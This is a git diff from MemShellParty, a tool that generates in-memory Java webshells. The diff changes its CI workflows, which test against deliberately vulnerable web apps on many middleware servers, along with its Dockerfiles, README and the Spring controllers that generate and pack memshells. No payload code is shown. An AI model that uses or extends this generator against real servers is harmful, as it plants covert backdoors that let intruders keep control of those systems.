uses: docker/login-action@v3
|
||||
with:
|
||||
registry: docker.io
|
||||
username: ${{ vars.DOCKERHUB_USERNAME }}
|
||||
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
|
||||
- name: Set up QEMU
|
||||
uses: docker/setup-qemu-action@v4
|
||||
uses: docker/setup-qemu-action@v3
|
||||
- name: Set up Docker Buildx
|
||||
uses: docker/setup-buildx-action@v4
|
||||
uses: docker/setup-buildx-action@v3
|
||||
|
||||
- name: Build and push
|
||||
uses: docker/build-push-action@v7
|
||||
uses: docker/build-push-action@v6
|
||||
with:
|
||||
context: boot
|
||||
platforms: linux/amd64,linux/arm64
|
||||
@@ -95,15 +95,15 @@ jobs:
|
||||
needs: [ build-jar ]
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@v4
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@v4
|
||||
with:
|
||||
distribution: 'temurin'
|
||||
java-version: 17
|
||||
|
||||
- name: Setup Gradle
|
||||
uses: gradle/actions/setup-gradle@v6
|
||||
uses: gradle/actions/setup-gradle@v4
|
||||
|
||||
- name: Publish with Gradle
|
||||
env:
|
||||
|
||||
@@ -1,7 +1,6 @@
|
||||
name: Docker Build Test
|
||||
|
||||
on:
|
||||
workflow_dispatch:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
@@ -23,7 +22,7 @@ jobs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout code
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@v4
|
||||
- name: Build Docker image
|
||||
run: |
|
||||
docker build --build-arg ROUTE_ROOT_PATH=/memshell-party --build-arg CONTEXT_PATH=/memshell-party -t app .
|
||||
|
||||
@@ -15,21 +15,21 @@ jobs:
|
||||
name: Docker Push
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@v4
|
||||
- name: Login to Docker Hub
|
||||
uses: docker/login-action@v4
|
||||
uses: docker/login-action@v3
|
||||
with:
|
||||
registry: docker.io
|
||||
username: ${{ vars.DOCKERHUB_USERNAME }}
|
||||
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
|
||||
- name: Set up QEMU
|
||||
uses: docker/setup-qemu-action@v4
|
||||
uses: docker/setup-qemu-action@v3
|
||||
- name: Set up Docker Buildx
|
||||
uses: docker/setup-buildx-action@v4
|
||||
uses: docker/setup-buildx-action@v3
|
||||
|
||||
- name: Build and push RedQueen
|
||||
uses: docker/build-push-action@v7
|
||||
uses: docker/build-push-action@v6
|
||||
with:
|
||||
context: .
|
||||
platforms: linux/amd64,linux/arm64
|
||||
|
||||
@@ -9,7 +9,6 @@ on:
|
||||
- './github/workflows/memshell-integration-test.yml'
|
||||
- '**/memshell/**'
|
||||
- '**/packer/**'
|
||||
- '**/dubbo/**'
|
||||
|
||||
concurrency:
|
||||
group: ${{ github.workflow }}-${{ github.ref }}-${{ github.event_name }}
|
||||
@@ -24,9 +23,9 @@ jobs:
|
||||
- middleware: "tomcat"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-expression:war :vul:vul-webapp-deserialize:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "jetty"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-servlet2:war :vul:vul-webapp-jakarta:war"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "jbossas"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-servlet2:war"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "jbosseap"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "wildfly"
|
||||
@@ -34,7 +33,7 @@ jobs:
|
||||
- middleware: "glassfish"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "resin"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-servlet2:war"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "payara"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "websphere"
|
||||
@@ -42,49 +41,38 @@ jobs:
|
||||
- middleware: "websphere7"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "weblogic"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-servlet2:war :vul:vul-webapp-jakarta:war"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "springwebmvc"
|
||||
depend_tasks: ":vul:vul-springboot1:bootJar :vul:vul-springboot2:bootJar :vul:vul-springboot2-jetty:bootJar :vul:vul-springboot2-undertow:bootJar :vul:vul-springboot2:bootWar :vul:vul-springboot3:bootJar :vul:vul-springboot359:bootJar :vul:vul-springboot4:bootJar"
|
||||
depend_tasks: ":vul:vul-springboot1:bootJar :vul:vul-springboot2:bootJar :vul:vul-springboot2-jetty:bootJar :vul:vul-springboot2-undertow:bootJar :vul:vul-springboot2:bootWar :vul:vul-springboot3:bootJar"
|
||||
- middleware: "springwebflux"
|
||||
depend_tasks: ":vul:vul-springboot2-webflux:bootJar :vul:vul-springboot3-webflux:bootJar :vul:vul-springboot4-webflux:bootJar"
|
||||
depend_tasks: ":vul:vul-springboot2-webflux:bootJar :vul:vul-springboot3-webflux:bootJar"
|
||||
- middleware: "xxljob"
|
||||
depend_tasks: ""
|
||||
- middleware: "struts2"
|
||||
depend_tasks: ":vul:vul-struts2:war"
|
||||
- middleware: "jenkins"
|
||||
depend_tasks: ""
|
||||
- middleware: "geronimo"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "dubbo"
|
||||
depend_tasks: ":vul:vul-dubbo:dubboProviderFatJars :tools:command:dubboClientClasspath"
|
||||
- middleware: "struct2"
|
||||
depend_tasks: ":vul:vul-struct2:war"
|
||||
runs-on: ubuntu-22.04
|
||||
name: ${{ matrix.cases.middleware }}
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@v4
|
||||
with:
|
||||
distribution: 'temurin'
|
||||
java-version: 17
|
||||
|
||||
- name: Setup Gradle
|
||||
uses: gradle/actions/setup-gradle@v6
|
||||
uses: gradle/actions/setup-gradle@v4
|
||||
|
||||
- name: Prepare for Integration Test
|
||||
run: ./gradlew ${{ matrix.cases.depend_tasks }}
|
||||
|
||||
- name: Integration Test with gradle
|
||||
if: matrix.cases.middleware != 'dubbo'
|
||||
run: ./gradlew :integration-test:test --tests '*.memshell.${{ matrix.cases.middleware }}.*' --info
|
||||
|
||||
- name: Dubbo Integration Test with gradle
|
||||
if: matrix.cases.middleware == 'dubbo'
|
||||
run: ./gradlew :integration-test:dubboContainerTest --info
|
||||
|
||||
- name: Export Integration Test Summary
|
||||
uses: mikepenz/action-junit-report@v5
|
||||
if: success() || failure()
|
||||
with:
|
||||
report_paths: '**/build/test-results/*/TEST-*.xml'
|
||||
report_paths: '**/build/test-results/test/TEST-*.xml'
|
||||
|
||||
@@ -21,9 +21,9 @@ jobs:
|
||||
- middleware: "tomcat"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-expression:war :vul:vul-webapp-deserialize:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "jetty"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-servlet2:war :vul:vul-webapp-jakarta:war"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "jbossas"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-servlet2:war"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "jbosseap"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "wildfly"
|
||||
@@ -31,7 +31,7 @@ jobs:
|
||||
- middleware: "glassfish"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "resin"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-servlet2:war"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "payara"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-jakarta:war"
|
||||
- middleware: "websphere"
|
||||
@@ -39,27 +39,25 @@ jobs:
|
||||
- middleware: "websphere7"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "weblogic"
|
||||
depend_tasks: ":vul:vul-webapp:war :vul:vul-webapp-servlet2:war"
|
||||
depend_tasks: ":vul:vul-webapp:war"
|
||||
- middleware: "springwebmvc"
|
||||
depend_tasks: ":vul:vul-springboot1:bootJar :vul:vul-springboot2:bootJar :vul:vul-springboot2-jetty:bootJar :vul:vul-springboot2-undertow:bootJar :vul:vul-springboot2:bootWar :vul:vul-springboot3:bootJar :vul:vul-springboot359:bootJar :vul:vul-springboot4:bootJar"
|
||||
- middleware: "springwebflux"
|
||||
depend_tasks: ":vul:vul-springboot2-webflux:bootJar :vul:vul-springboot3-webflux:bootJar :vul:vul-springboot4-webflux:bootJar"
|
||||
- middleware: "struts2"
|
||||
depend_tasks: ":vul:vul-struts2:war"
|
||||
depend_tasks: ":vul:vul-springboot1:bootJar :vul:vul-springboot2:bootJar :vul:vul-springboot2-jetty:bootJar :vul:vul-springboot2-undertow:bootJar :vul:vul-springboot2:bootWar :vul:vul-springboot3:bootJar"
|
||||
- middleware: "struct2"
|
||||
depend_tasks: ":vul:vul-struct2:war"
|
||||
runs-on: ubuntu-22.04
|
||||
name: ${{ matrix.cases.middleware }}
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@v4
|
||||
with:
|
||||
distribution: 'temurin'
|
||||
java-version: 17
|
||||
|
||||
- name: Setup Gradle
|
||||
uses: gradle/actions/setup-gradle@v6
|
||||
uses: gradle/actions/setup-gradle@v4
|
||||
|
||||
- name: Prepare for Integration Test
|
||||
run: ./gradlew ${{ matrix.cases.depend_tasks }}
|
||||
@@ -68,7 +66,7 @@ jobs:
|
||||
run: ./gradlew :integration-test:test --tests '*.probe.${{ matrix.cases.middleware }}.*' --info
|
||||
|
||||
- name: Export Integration Test Summary
|
||||
uses: mikepenz/action-junit-report@v6
|
||||
uses: mikepenz/action-junit-report@v5
|
||||
if: success() || failure()
|
||||
with:
|
||||
report_paths: '**/build/test-results/test/TEST-*.xml'
|
||||
|
||||
@@ -14,7 +14,7 @@ jobs:
|
||||
version-without-v: ${{ steps.get_version.outputs.version-without-v }}
|
||||
changelog: ${{ steps.get_changelog.outputs.changelog }}
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@v4
|
||||
|
||||
- name: Get Version
|
||||
id: get_version
|
||||
@@ -36,16 +36,16 @@ jobs:
|
||||
name: Build Jar
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@v4
|
||||
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@v4
|
||||
with:
|
||||
distribution: 'temurin'
|
||||
java-version: 17
|
||||
|
||||
- name: Setup Gradle
|
||||
uses: gradle/actions/setup-gradle@v6
|
||||
uses: gradle/actions/setup-gradle@v4
|
||||
|
||||
- name: Setup Node
|
||||
uses: actions/setup-node@v6
|
||||
@@ -65,7 +65,7 @@ jobs:
|
||||
run: ./gradlew :boot:bootjar -x test
|
||||
|
||||
- name: Upload Boot Jar
|
||||
uses: actions/upload-artifact@v7
|
||||
uses: actions/upload-artifact@v4
|
||||
with:
|
||||
name: boot
|
||||
path: boot/build/libs/*.jar
|
||||
@@ -75,7 +75,7 @@ jobs:
|
||||
needs: [ info, build-jar ]
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@v4
|
||||
|
||||
- name: Download Boot Jar
|
||||
uses: actions/download-artifact@v4
|
||||
@@ -84,26 +84,26 @@ jobs:
|
||||
path: boot/build/libs
|
||||
|
||||
- name: Login to GitHub Container Registry
|
||||
uses: docker/login-action@v4
|
||||
uses: docker/login-action@v3
|
||||
with:
|
||||
registry: ghcr.io
|
||||
username: ${{ github.repository_owner }}
|
||||
password: ${{ secrets.GITHUB_TOKEN }}
|
||||
|
||||
- name: Login to Docker Hub
|
||||
uses: docker/login-action@v4
|
||||
uses: docker/login-action@v3
|
||||
with:
|
||||
registry: docker.io
|
||||
username: ${{ vars.DOCKERHUB_USERNAME }}
|
||||
password: ${{ secrets.DOCKERHUB_TOKEN }}
|
||||
|
||||
- name: Set up QEMU
|
||||
uses: docker/setup-qemu-action@v4
|
||||
uses: docker/setup-qemu-action@v3
|
||||
- name: Set up Docker Buildx
|
||||
uses: docker/setup-buildx-action@v4
|
||||
uses: docker/setup-buildx-action@v3
|
||||
|
||||
- name: Build and push
|
||||
uses: docker/build-push-action@v7
|
||||
uses: docker/build-push-action@v6
|
||||
with:
|
||||
context: boot
|
||||
platforms: linux/amd64,linux/arm64
|
||||
@@ -115,7 +115,7 @@ jobs:
|
||||
ghcr.io/reajason/memshell-party:latest
|
||||
|
||||
- name: Build and push RedQueen
|
||||
uses: docker/build-push-action@v7
|
||||
uses: docker/build-push-action@v6
|
||||
with:
|
||||
context: .
|
||||
platforms: linux/amd64,linux/arm64
|
||||
@@ -130,15 +130,15 @@ jobs:
|
||||
name: Deploy to Maven Central
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@v4
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@v4
|
||||
with:
|
||||
distribution: 'temurin'
|
||||
java-version: 17
|
||||
|
||||
- name: Setup Gradle
|
||||
uses: gradle/actions/setup-gradle@v6
|
||||
uses: gradle/actions/setup-gradle@v4
|
||||
|
||||
- name: Publish with Gradle
|
||||
env:
|
||||
@@ -156,7 +156,7 @@ jobs:
|
||||
permissions:
|
||||
contents: write
|
||||
steps:
|
||||
- uses: actions/checkout@v6
|
||||
- uses: actions/checkout@v4
|
||||
|
||||
- name: Download Boot Jar
|
||||
uses: actions/download-artifact@v4
|
||||
|
||||
@@ -22,16 +22,16 @@ jobs:
|
||||
runs-on: ubuntu-22.04
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@v4
|
||||
with:
|
||||
distribution: 'temurin'
|
||||
java-version: 17
|
||||
|
||||
- name: Setup Gradle
|
||||
uses: gradle/actions/setup-gradle@v6
|
||||
uses: gradle/actions/setup-gradle@v4
|
||||
|
||||
- name: Prepare for Integration Test
|
||||
if: ${{ inputs.depend_tasks != '' }}
|
||||
|
||||
@@ -17,16 +17,16 @@ jobs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- name: Checkout
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@v4
|
||||
|
||||
- name: Setup Java
|
||||
uses: actions/setup-java@v5
|
||||
uses: actions/setup-java@v4
|
||||
with:
|
||||
distribution: 'temurin'
|
||||
java-version: 17
|
||||
|
||||
- name: Setup Gradle
|
||||
uses: gradle/actions/setup-gradle@v6
|
||||
uses: gradle/actions/setup-gradle@v4
|
||||
|
||||
- name: Generator Unit Test with Gradle
|
||||
run: ./gradlew :generator:test
|
||||
|
||||
+1
-3
@@ -61,6 +61,4 @@ integration-test/**/apusic
|
||||
integration-test/**/bes
|
||||
integration-test/**/tongweb
|
||||
integration-test/**/inforsuite
|
||||
integration-test/**/primeton
|
||||
vul/vul-springboot3-bes
|
||||
vul/vul-springboot3-tongweb
|
||||
integration-test/**/primeton
|
||||
+7
-8
@@ -6,9 +6,9 @@ RUN git clone --depth 1 https://github.com/ReaJason/MemShellParty.git . && \
|
||||
rm -rf vul integration-test tools
|
||||
|
||||
# https://hub.docker.com/r/oven/bun
|
||||
FROM --platform=$BUILDPLATFORM oven/bun:1.4.0 AS frontend
|
||||
FROM --platform=$BUILDPLATFORM oven/bun:1.3.6 AS frontend
|
||||
|
||||
ARG ROUTE_ROOT_PATH=""
|
||||
ARG ROUTE_ROOT_PATH="/"
|
||||
ARG CONTEXT_PATH=""
|
||||
|
||||
WORKDIR /usr/src/web
|
||||
@@ -16,8 +16,7 @@ WORKDIR /usr/src/web
|
||||
ENV VITE_APP_API_URL=${CONTEXT_PATH} \
|
||||
VITE_APP_BASE_PATH=${ROUTE_ROOT_PATH}/ui
|
||||
|
||||
COPY --from=source /usr/src/web/package.json /usr/src/web/bun.lock /usr/src/web/
|
||||
COPY --from=source /usr/src/web/vendor/cfr /usr/src/web/vendor/cfr
|
||||
COPY --from=source /usr/src/web/package.json /usr/src/web/bun.lock /usr/src/web/source.config.ts /usr/src/web/
|
||||
|
||||
RUN bun install --frozen-lockfile
|
||||
|
||||
@@ -25,8 +24,8 @@ COPY --from=source /usr/src/web /usr/src/web
|
||||
|
||||
RUN bun run build
|
||||
|
||||
# https://hub.docker.com/_/eclipse-temurin/tags?name=21.
|
||||
FROM --platform=$BUILDPLATFORM eclipse-temurin:21.0.12_8-jdk-noble AS backend
|
||||
# https://hub.docker.com/_/eclipse-temurin/tags?name=17.
|
||||
FROM --platform=$BUILDPLATFORM eclipse-temurin:17.0.17_10-jdk-noble AS backend
|
||||
|
||||
WORKDIR /usr/src
|
||||
|
||||
@@ -36,7 +35,7 @@ COPY --from=frontend /usr/src/boot/src/main/resources /usr/src/boot/src/main/res
|
||||
|
||||
RUN ./gradlew :boot:bootjar -x test
|
||||
|
||||
FROM eclipse-temurin:21.0.12_8-jre-noble
|
||||
FROM eclipse-temurin:17.0.17_10-jre-noble
|
||||
|
||||
LABEL authors="ReaJason<[email protected]>"
|
||||
|
||||
@@ -57,4 +56,4 @@ ENV INTERNAL_JAVA_OPTS="\
|
||||
|
||||
EXPOSE 8080
|
||||
|
||||
ENTRYPOINT ["sh", "-c", "java $JAVA_OPTS $INTERNAL_JAVA_OPTS -jar app.jar $BOOT_OPTS"]
|
||||
ENTRYPOINT ["sh", "-c", "java $JAVA_OPTS $INTERNAL_JAVA_OPTS -jar app.jar $BOOT_OPTS"]
|
||||
@@ -47,7 +47,7 @@ MemShellParty 是一款专注于主流 Web 中间件的内存马快速生成工
|
||||
|
||||
### 使用前必看
|
||||
|
||||
[适配情况](https://party.mem.mk/ui/docs/compatibility),用于了解 MemShellParty
|
||||
[Java 服务简介.md](web/content/docs/server-intro.mdx),用于了解 MemShellParty
|
||||
中针对各个服务适配的情况,针对不同的应用选择合适的服务类型。
|
||||
|
||||
探测马中探测服务类型已经做了一一对应,探测出来的服务类型,即是可生成内存马的服务类型(非中间件类型,例如 Apusic10 探测出来的结果为
|
||||
@@ -78,12 +78,6 @@ docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party ghcr.io/
|
||||
docker run --pull=always --rm -it -d -p 8080:8080 --name memshell-party ghcr.nju.edu.cn/reajason/memshell-party:latest
|
||||
```
|
||||
|
||||
## 贡献者
|
||||
|
||||
<a href="https://github.com/ReaJason/MemShellParty/graphs/contributors">
|
||||
<img src="https://contrib.rocks/image?repo=ReaJason/MemShellParty" width="20%" />
|
||||
</a>
|
||||
|
||||
## Special Thanks
|
||||
|
||||
- [vulhub/java-chains](https://github.com/vulhub/java-chains)
|
||||
|
||||
Binary file not shown.
Binary file not shown.
+1
-1
@@ -1,4 +1,4 @@
|
||||
FROM eclipse-temurin:21.0.11_10-jre-noble
|
||||
FROM eclipse-temurin:17.0.17_10-jre-noble
|
||||
|
||||
LABEL authors="ReaJason<[email protected]>"
|
||||
|
||||
|
||||
@@ -1,6 +1,6 @@
|
||||
plugins {
|
||||
id("java")
|
||||
id("org.springframework.boot") version "4.1.0"
|
||||
id("org.springframework.boot") version "3.5.11"
|
||||
id("io.spring.dependency-management") version "1.1.7"
|
||||
}
|
||||
|
||||
@@ -26,6 +26,7 @@ extra["byte-buddy.version"] = libs.versions.byte.buddy.get()
|
||||
dependencies {
|
||||
implementation(project(":generator")) {
|
||||
exclude(group = "commons-logging", module = "commons-logging")
|
||||
exclude(group = "com.reajason.javaweb", module = "thirdparty-tomcat")
|
||||
}
|
||||
implementation(project(":packer")) {
|
||||
exclude(group = "commons-logging", module = "commons-logging")
|
||||
|
||||
@@ -29,6 +29,12 @@ public class GlobalExceptionHandler {
|
||||
return new ErrorResponse(exception.getMessage());
|
||||
}
|
||||
|
||||
@ResponseStatus(HttpStatus.BAD_REQUEST)
|
||||
@ExceptionHandler(IllegalArgumentException.class)
|
||||
public ErrorResponse handleIllegalArgumentException(IllegalArgumentException exception) {
|
||||
return new ErrorResponse(exception.getMessage());
|
||||
}
|
||||
|
||||
@ResponseStatus(HttpStatus.INTERNAL_SERVER_ERROR)
|
||||
@ExceptionHandler(Throwable.class)
|
||||
public ErrorResponse handleThrowable(Throwable throwable) {
|
||||
|
||||
@@ -1,12 +1,10 @@
|
||||
package com.reajason.javaweb.boot.controller;
|
||||
|
||||
import com.reajason.javaweb.boot.vo.CommandConfigVO;
|
||||
import com.reajason.javaweb.boot.vo.PackerVO;
|
||||
import com.reajason.javaweb.memshell.ServerFactory;
|
||||
import com.reajason.javaweb.memshell.config.CommandConfig;
|
||||
import com.reajason.javaweb.memshell.server.AbstractServer;
|
||||
import com.reajason.javaweb.packer.Packers;
|
||||
import com.reajason.javaweb.probe.generator.response.ResponseBodyGenerator;
|
||||
import org.springframework.web.bind.annotation.CrossOrigin;
|
||||
import org.springframework.web.bind.annotation.GetMapping;
|
||||
import org.springframework.web.bind.annotation.RequestMapping;
|
||||
@@ -23,12 +21,7 @@ import java.util.*;
|
||||
@CrossOrigin("*")
|
||||
public class ConfigController {
|
||||
|
||||
/**
|
||||
* @deprecated use {@link #config()} for memshell configuration and
|
||||
* {@link #getProbeResponseBodyServers()} for probe ResponseBody servers.
|
||||
*/
|
||||
@RequestMapping("/servers")
|
||||
@Deprecated(since = "2.9.0", forRemoval = false)
|
||||
public Map<String, List<String>> getServers() {
|
||||
Map<String, List<String>> servers = new LinkedHashMap<>();
|
||||
List<String> supportedServers = ServerFactory.getSupportedServers();
|
||||
@@ -40,40 +33,30 @@ public class ConfigController {
|
||||
return servers;
|
||||
}
|
||||
|
||||
/**
|
||||
* @deprecated use {@link #getPackerTree()} for parent/child packer metadata.
|
||||
*/
|
||||
@RequestMapping("/packers")
|
||||
@Deprecated(since = "2.9.0", forRemoval = false)
|
||||
public List<String> getPackers() {
|
||||
return Arrays.stream(Packers.values())
|
||||
.filter(packers -> packers.getParentPacker() == null)
|
||||
.map(Packers::name).toList();
|
||||
}
|
||||
|
||||
/**
|
||||
* 返回父/子 packer 层级结构,供前端在「父模式 / 子模式」之间选择。
|
||||
* 单独新增端点而非修改 {@link #getPackers()},以避免破坏旧版本前端对返回值的依赖。
|
||||
*/
|
||||
@RequestMapping("/packers/tree")
|
||||
public List<PackerVO> getPackerTree() {
|
||||
return Arrays.stream(Packers.values())
|
||||
.filter(packers -> packers.getParentPacker() == null)
|
||||
.map(packers -> new PackerVO(
|
||||
packers.name(),
|
||||
Packers.getPackersWithParent(packers.getInstance().getClass())
|
||||
.stream().map(Packers::name).toList()))
|
||||
.toList();
|
||||
}
|
||||
|
||||
@RequestMapping("/probe/response-body/servers")
|
||||
public List<String> getProbeResponseBodyServers() {
|
||||
return ResponseBodyGenerator.getSupportedServers();
|
||||
public List<PackerCategoryDTO> getPackers() {
|
||||
List<PackerCategoryDTO> result = new ArrayList<>();
|
||||
for (Map.Entry<String, List<Packers>> entry : Packers.groupedPackers().entrySet()) {
|
||||
PackerCategoryDTO category = new PackerCategoryDTO();
|
||||
category.setName(entry.getKey());
|
||||
List<PackerOptionDTO> options = new ArrayList<>();
|
||||
for (Packers packer : entry.getValue()) {
|
||||
PackerOptionDTO option = new PackerOptionDTO();
|
||||
option.setName(packer.name());
|
||||
option.setOutputKind(packer.getOutputKind());
|
||||
option.setCategoryAnchor(packer.hasChildren());
|
||||
option.setSchema(packer.getSchema());
|
||||
options.add(option);
|
||||
}
|
||||
category.setPackers(options);
|
||||
result.add(category);
|
||||
}
|
||||
return result;
|
||||
}
|
||||
|
||||
@RequestMapping
|
||||
public Map<String, Map<?, ?>> config() {
|
||||
Map<String, Map<?, ?>> coreMap = new LinkedHashMap<>(16);
|
||||
Map<String, Map<?, ?>> coreMap = new HashMap<>(16);
|
||||
List<String> supportedServers = ServerFactory.getSupportedServers();
|
||||
for (String supportedServer : supportedServers) {
|
||||
AbstractServer server = ServerFactory.getServer(supportedServer);
|
||||
@@ -97,4 +80,64 @@ public class ConfigController {
|
||||
commandConfigVO.setImplementationClasses(Arrays.stream(CommandConfig.ImplementationClass.values()).toList());
|
||||
return commandConfigVO;
|
||||
}
|
||||
|
||||
public static class PackerCategoryDTO {
|
||||
private String name;
|
||||
private List<PackerOptionDTO> packers;
|
||||
|
||||
public String getName() {
|
||||
return name;
|
||||
}
|
||||
|
||||
public void setName(String name) {
|
||||
this.name = name;
|
||||
}
|
||||
|
||||
public List<PackerOptionDTO> getPackers() {
|
||||
return packers;
|
||||
}
|
||||
|
||||
public void setPackers(List<PackerOptionDTO> packers) {
|
||||
this.packers = packers;
|
||||
}
|
||||
}
|
||||
|
||||
public static class PackerOptionDTO {
|
||||
private String name;
|
||||
private String outputKind;
|
||||
private boolean categoryAnchor;
|
||||
private Object schema;
|
||||
|
||||
public String getName() {
|
||||
return name;
|
||||
}
|
||||
|
||||
public void setName(String name) {
|
||||
this.name = name;
|
||||
}
|
||||
|
||||
public String getOutputKind() {
|
||||
return outputKind;
|
||||
}
|
||||
|
||||
public void setOutputKind(String outputKind) {
|
||||
this.outputKind = outputKind;
|
||||
}
|
||||
|
||||
public boolean isCategoryAnchor() {
|
||||
return categoryAnchor;
|
||||
}
|
||||
|
||||
public void setCategoryAnchor(boolean categoryAnchor) {
|
||||
this.categoryAnchor = categoryAnchor;
|
||||
}
|
||||
|
||||
public Object getSchema() {
|
||||
return schema;
|
||||
}
|
||||
|
||||
public void setSchema(Object schema) {
|
||||
this.schema = schema;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
+14
-7
@@ -7,9 +7,11 @@ import com.reajason.javaweb.memshell.MemShellResult;
|
||||
import com.reajason.javaweb.memshell.config.InjectorConfig;
|
||||
import com.reajason.javaweb.memshell.config.ShellConfig;
|
||||
import com.reajason.javaweb.memshell.config.ShellToolConfig;
|
||||
import com.reajason.javaweb.packer.AggregatePacker;
|
||||
import com.reajason.javaweb.packer.ClassPackerConfig;
|
||||
import com.reajason.javaweb.packer.JarPacker;
|
||||
import com.reajason.javaweb.packer.JarPackerConfig;
|
||||
import com.reajason.javaweb.packer.Packer;
|
||||
import com.reajason.javaweb.packer.Packers;
|
||||
import org.springframework.web.bind.annotation.*;
|
||||
|
||||
import java.util.Base64;
|
||||
@@ -22,19 +24,24 @@ import java.util.Base64;
|
||||
@RequestMapping("/api/memshell/generate")
|
||||
@CrossOrigin("*")
|
||||
public class MemShellGeneratorController {
|
||||
|
||||
@PostMapping
|
||||
public MemShellGenerateResponse generate(@RequestBody MemShellGenerateRequest request) {
|
||||
ShellConfig shellConfig = request.getShellConfig();
|
||||
ShellToolConfig shellToolConfig = request.parseShellToolConfig();
|
||||
InjectorConfig injectorConfig = request.getInjectorConfig();
|
||||
MemShellResult generateResult = MemShellGenerator.generate(shellConfig, injectorConfig, shellToolConfig);
|
||||
Packer packer = request.getPacker().getInstance();
|
||||
if (packer instanceof AggregatePacker) {
|
||||
return new MemShellGenerateResponse(generateResult, ((AggregatePacker) packer).packAll(generateResult.toClassPackerConfig()));
|
||||
if (request.getPackerSpec() == null) {
|
||||
throw new IllegalArgumentException("packerSpec is required");
|
||||
}
|
||||
Packers packers = Packers.fromName(request.getPackerSpec().getName());
|
||||
Packer<?> packer = packers.getInstance();
|
||||
if (packer instanceof JarPacker) {
|
||||
return new MemShellGenerateResponse(generateResult, Base64.getEncoder().encodeToString(((JarPacker) packer).packBytes(generateResult.toJarPackerConfig())));
|
||||
JarPackerConfig<?> jarPackerConfig = generateResult.toJarPackerConfig();
|
||||
return new MemShellGenerateResponse(generateResult, Base64.getEncoder().encodeToString(((JarPacker) packer).packBytes(jarPackerConfig)));
|
||||
}
|
||||
return new MemShellGenerateResponse(generateResult, packer.pack(generateResult.toClassPackerConfig()));
|
||||
ClassPackerConfig classPackerConfig = generateResult.toClassPackerConfig();
|
||||
classPackerConfig.setCustomConfig(packer.resolveCustomConfig(request.getPackerSpec().getConfig()));
|
||||
return new MemShellGenerateResponse(generateResult, packer.pack(classPackerConfig));
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
+9
-6
@@ -2,8 +2,9 @@ package com.reajason.javaweb.boot.controller;
|
||||
|
||||
import com.reajason.javaweb.boot.dto.ProbeShellGenerateRequest;
|
||||
import com.reajason.javaweb.boot.dto.ProbeShellGenerateResponse;
|
||||
import com.reajason.javaweb.packer.AggregatePacker;
|
||||
import com.reajason.javaweb.packer.ClassPackerConfig;
|
